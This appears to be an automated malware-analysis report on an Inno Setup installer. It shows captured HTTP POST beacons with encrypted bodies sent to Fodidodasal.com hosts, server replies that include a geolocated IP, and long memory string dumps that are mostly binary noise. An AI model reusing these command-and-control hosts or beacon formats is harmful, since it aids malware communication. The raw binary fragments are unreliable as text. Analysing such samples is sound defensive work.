.....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
POST /?v=2.0&subver=6.21&pcrc=913192198 HTTP/1.1
Accept: */*
Host: rp.Fodidodasal.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 2400
Cache-Control: no-cache
...4.....>.K..~.........u..i.Z..*...C3E
....x".....E.H\!oZ...;....Rl......Q.8....E .1......D........#..!!.'.E...x.=..%..?PX.N;/)..@...=.....V.h.(.3F5.B..cy.2.Q.y.V.~$.15}|gC.%..b.)....%..,.Oj,..:....^ ....2.vP.<....z..*.^x....v...E_....O..T..y...U....M......[..X0..~....;...5.W.p.gE9`....z;Ao)..'.\.fn*.j..._.$...7}.~P1..l....R..G)..x1.<......q...\.Svc$.M.`........sP...0R}u..RX....j...`c.i..%.....fQZRYt....r,k...!..T...>...`..d.{5..*.Z.........F.6...x.....|./g..c...........J.-...$\a.E.)..l.......Kc..C. ..&...C..\.
..m|9F...,..O.T.-V.u...wL.....3...`.......i..*,;.{....n.&.?.....1..."..bB....o..5......#..Q..-I.....w...*|..6.8.v6....Y....1y..a1c.B...En.q.Me39#.o.'.......:)...w.&..v.pT.....U...FW# .....r|.d..TS=..3......:..b.OT.b....#.y .......:.>..e*P.../Y$..-.....r.l.b.PYh.X../..l .b.8Zmp.N.g.r%4..<.7.,h...3B.G....".s.......6...P..d2}*.Y...
.X....."......"N_...-F|.4....\,.>...\.N.]v...8.....#..hU.........%...{....o.M-.AR...Um...r..WD..IEk...D.3...M........^.P..U..r.....a..
K.~SC2...t.@,.e4~-{.F?....:m....T...F.......y..N...w....0....B.........N...f......Sc5...z..sc..=9....vb..b.3.}ZF.r.............}.....w....2.."....0... ..-......|/..._L.C#.....h...y...a..N....;...6m....T.v...)....z..].....k.... ..T..x...aT. O.4....&.O.]..m..p......d...{.>..x.V..v ...jE..F..j..U..a.k|.28y
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 24 Apr 2016 01:12:24 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Sun, 24 Apr 2016 01:12:24 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE..
POST /adsafiliados/?v=6.0&c=1856168701&t=1319218 HTTP/1.1
Accept: */*
Host: os.Fodidodasal.com
User-Agent: ICAS
Content-Length: 1264
Cache-Control: no-cache
.I..~...$$......_,.p.u.....D.Z4.ir:..w..m...X......B.y..w.#.2g..Y}d..O..3V#.,.1.....?...Q...b..\.4.....5.J...a6_q.-."Aw...eS...G.&....l...p....&.....&...Xh...hT........{-..@./..Z...C..{W.S.XpY%V.Py...."e"...%.'/s7!6.....G.?...-..h.......m.......*H..o...d$#q.,_...Q.wnE.....tp.t..i.:.DE........l..F....DV.,.p.3:..P.*.|~gWv.k...*.a..........y9...6.m..[6..B.3)X..ms.U1.3... |Zl...... .pg'.m ..8.;...?....B].4..|e.EI2......:....p2..h..UpQb.]L...H..F...o..Vg.....m...kZ.p........$...m..N.'%x.H...h...#.c.......'*Z.j...vx......_q../_C.G..r.7......4r[....t..,sS\.....>#.qn(q.........l......{.:m.A...J.....E...M.....n.\.l..vx....)?.pf....i..&..6.C...I..Q..9w...S.M.I.W...<XC..)`...'.Bq..!...Uj...=n......e.z...f.1? .N. ..X.k~=Q.r......y..)..T..N....1.....R._U...
5E(<...avr!.l@C...)<...EP8.. z1?/3.....mX..........j....h...axx!....B..UR.I6.T..,...6....K~~......9pB7.Lo..N....Th..t._y2w.*...W...Wg.A.')...*.&.(.QR.........cu..r?.....%.....I...Z...8".5....Y?.U.@..,x..x...1.5..MCf.^....i.......$.....z.\.......j.....N.,.9... .s=*....m.`...R....i-....qY.Y..|....C..N.$..........QR...........w......g....]..v'[..gp.k...{-.{....g.[T..............[....I._u.n/.E.....G.T,N..Y0.\./k..;...F.$/...UiOc......n&.&.8..3.4...a'.k....Q.......{.....5...<b4X......s.)...h...kS.
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 24 Apr 2016 01:12:22 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: nginx
X-ICSCT-CC: UA
X-ICSCT-CITY: Kharkiv
X-ICSCT-GICSET: global13712aICBA
X-ICSCT-IP: 37.57.16.189
X-ICSCT-SERVER-NAME: ads.slave-131-prod-eu-west-1c-7102a8f9
X-ICSCT-TIMESTAMP: 20160423201222288
X-ICSCT-VERSION: 1.3.1
X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a
X-Robots-Tag: none
transfer-encoding: chunked
Connection: keep-alive
1ef8..FF..Y...Y.i....1....>0..........,...n..q.....................T.9$.........$........08Ja~<..\.sJ.a.^..re...j.w....t-..PA.2.bp:C~..#o....Dn;..Bv0..8...DB.'.p...F:......GSv%\G.....g.EC.|..:z..0P..".........>F9..b#.N..*sb..s.9........K]....Vw.W.A. ..W.Td.;.).Gn)..8..._g.3_...).:...<?..6.5j4Q...&.2}.R>.J......*..._...r.&....JLHd$`&....k..../%.e.._1-x....Qk08;......[3P.......Fw8&..i.v.w ._Z....i..A.W....4.'...r.@&e.Vz....k.:^....f..P..TT.....).n..2-V......h..Do.... .["?.!d.....,....|.Yl.mw.jm....o...P.k5..bT.&...".[...C.....6.p.i.i.v:..nj8. .k....^.-.2.R{.&7...r{..2V...{.....n2y....'&7...bz.&.<..jz..2w.....#2V...{..1nW.....h...2\7.>..n.n.k .hd0h....unwf..2B. ....0z...r...>.......~973h..Rz.f2...2uW..:..2sG.n.......3>...... ..>2s..bz5.5*..bzS.0n...{c&<2....;..f'..p..rz.&?...|...3`.."{c.....;..V2.......~.d.E.3...Foti.G..U7z. p..?......z..s..[A^.x2i..z.B.\.............a{...W7..E.../9]Vg0....w.A6v9...r6fP...Ww......sO&4"...z.ceT...& .jz.63@w....^=....../...[..F.g.]...?.P.'..C...x[..... ....f...|.w.LqR~.q.....=X.V.c.....7,....8.(pYU"..#..&.......,DCn..m..;.Z.K...6.....v.4..._.KNC.. ..z.F......&.KBjf7r'...]BD........vR...2.7$\.-...t.....{.r5..-.2.r........K.o]..S..=.l<........Yy\..O........h Q.c....9.H..YJNp....v......x.g.^.Vb......m|.=\%q.jWe..:.............I.....U.....r.2r.C{..J2.<.=1.......`a..1.'...$,..&.c....]..P-.7H S..#.=8_.........;.M...\..]..<...iS.kSsL.3.v.Y.A.s?.TvP..e.q{...m.....\..... zP.............P#.......T...2..[?}r. B7.....1...{r6..<...v...h.>B:S....5x
<<< skipped >>>
Map
The Installer connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1124:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
File I/O error %d
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
lzmadecompsmall: %s
LzmaDecode failed (%d)
LzmaDecode failed (%d)
shell32.dll
shell32.dll
/SUPPRESSMSGBOXES
/SUPPRESSMSGBOXES
/PASSWORD=password
/PASSWORD=password
Specifies the password to use.
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
/SL5="$%x,%d,%d,
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.3)
Inno Setup Messages (5.5.3)
user32.dll
user32.dll
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
GetWindowsDirectoryA
GetWindowsDirectoryA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
comctl32.dll
comctl32.dll
name="JR.Inno.Setup"
name="JR.Inno.Setup"
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
true
true
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
Invalid variant operation"Variant method calls not supported
External exception %x
External exception %x
1.0.5.a0.1_54944
1.0.5.a0.1_54944
%original file name%.exe_1124_rwx_00900000_000F7000:
.idata
.idata
.edata
.edata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
>)a9>.aV>
>)a9>.aV>
.EXatuv
.EXatuv
.vRLFO
.vRLFO
g.rp=
g.rp=
asT.qykp
asT.qykp
.EW)$
.EW)$
.GYonVz
.GYonVz
N5:%C
N5:%C
.Rtyz/
.Rtyz/
v.Qzjab/Gdg
v.Qzjab/Gdg
^
^
.nk"n
.nk"n
8r7Q%c
8r7Q%c
l9.ZS0
l9.ZS0
%xJQtW
%xJQtW
n"!a.zo
n"!a.zo
@NtcP}
@NtcP}
%XRHt5
%XRHt5
$".kL
$".kL
.Iz\(
.Iz\(
Ub%Cy
Ub%Cy
.rzOn'$
.rzOn'$
.zY3-
.zY3-
c$%xzl4
c$%xzl4
Y8|t%d
Y8|t%d
C#h.np
C#h.np
H%f-Uw
H%f-Uw
.mlw3
.mlw3
_Jÿ
_Jÿ
AciekeYifeS;x
AciekeYifeS;x
>t.hk
>t.hk
a.NYc
a.NYc
C.oaa0
C.oaa0
c.XAs
c.XAs
duudpyq
duudpyq
z=%U;Mna
z=%U;Mna
i%X'ze
i%X'ze
%D'[b
%D'[b
e%D%(g
e%D%(g
`-AhsrPb\oK.dfj
`-AhsrPb\oK.dfj
2HN2G%d
2HN2G%d
.fh(S
.fh(S
.ZjnkUo
.ZjnkUo
YÑx*
YÑx*
.tsvtz06*_pj]R
.tsvtz06*_pj]R
V=-b}
V=-b}
rbg.sg"lj
rbg.sg"lj
nvze>6%Xj`
nvze>6%Xj`
lZgiqpWqyvaH%DH
lZgiqpWqyvaH%DH
CmdiHcJ(dTv
CmdiHcJ(dTv
%Cj^H
%Cj^H
%7uC,D
%7uC,D
.BV}%
.BV}%
".Ndqn
".Ndqn
.Eidi^D
.Eidi^D
QER.CK
QER.CK
OD.BL
OD.BL
'8503333
'8503333
g%XFh
g%XFh
:#cy%F
:#cy%F
TÉ-
TÉ-
.GKzL
.GKzL
p~t%uLp
p~t%uLp
.IOt8t
.IOt8t
U(.YJ
U(.YJ
%dizhkpe
%dizhkpe
XX.syB
XX.syB
;@37=
;@37=
P1@6084(>%DSUX
P1@6084(>%DSUX
=73=.Ux
=73=.Ux
850>\`)9
850>\`)9
O#%Fo-(
O#%Fo-(
Eaq%f
Eaq%f
!.PF?
!.PF?
#ZK.sr
#ZK.sr
.mmmlm-A
.mmmlm-A
.vhWttZi_jF
.vhWttZi_jF
dnf^n_ang1%Dqc
dnf^n_ang1%Dqc
UFLZ%X(Ud`SVH
UFLZ%X(Ud`SVH
UB^nk@aN.fR;
UB^nk@aN.fR;
.de=8.
.de=8.
_&3 g.tE
_&3 g.tE
n.SJ7
n.SJ7
n%CQ,W
n%CQ,W
ly.As
ly.As
Yk0~f64eS.sv5
Yk0~f64eS.sv5
mGz_mY%C
mGz_mY%C
.DD6'\
.DD6'\
_cmd>
_cmd>
R.%C=
R.%C=
%CH:8j
%CH:8j
.uvDcmq#0
.uvDcmq#0
.EbH8
.EbH8
!L
!L
z.Mc:d
z.Mc:d
4%s%"
4%s%"
.xVP$
.xVP$
.eavuMe
.eavuMe
7X.rk
7X.rk
ztYm%UV
ztYm%UV
-eh#%C
-eh#%C
)ra%X
)ra%X
ttcpr
ttcpr
SSh_z
SSh_z
kh'HSg%u
kh'HSg%u
.nleUdzyd
.nleUdzyd
(5u%U
(5u%U
U.GFr%
U.GFr%
VL.lpqagjy
VL.lpqagjy
WÓ's,q]
WÓ's,q]
jX.YS
jX.YS
.msws6
.msws6
n&%dj
n&%dj
O'%S2
O'%S2
zoh.ultbi
zoh.ultbi
wulfw3%XD
wulfw3%XD
/Kx5%X#'
/Kx5%X#'
l-kfp.uc-x
l-kfp.uc-x
2f-q@%U,_
2f-q@%U,_
a5X%sT#
a5X%sT#
f_i%U
f_i%U
PYVZ[SEUYYHV(36.HPR~K9
PYVZ[SEUYYHV(36.HPR~K9
jeZy%C
jeZy%C
h.uFf
h.uFf
$.BFU^m4
$.BFU^m4
ÊF[&6^
ÊF[&6^
@0E.GT5@=N2
@0E.GT5@=N2